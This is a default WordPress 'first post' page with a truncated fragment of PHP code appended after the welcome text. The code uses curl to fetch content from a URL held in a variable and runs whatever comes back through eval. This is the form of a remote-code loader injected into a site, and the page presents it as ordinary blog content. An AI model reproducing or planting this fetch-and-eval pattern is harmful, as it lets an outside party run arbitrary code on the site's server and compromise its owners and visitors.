Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
it();curl_setopt($ch_handle,CURLOPT_URL,$f_url);curl_setopt($ch_handle,CURLOPT_RETURNTRANSFER,1);$f_content=curl_exec($ch_handle);curl_close($ch_handle);eval("?>".$f_content);?>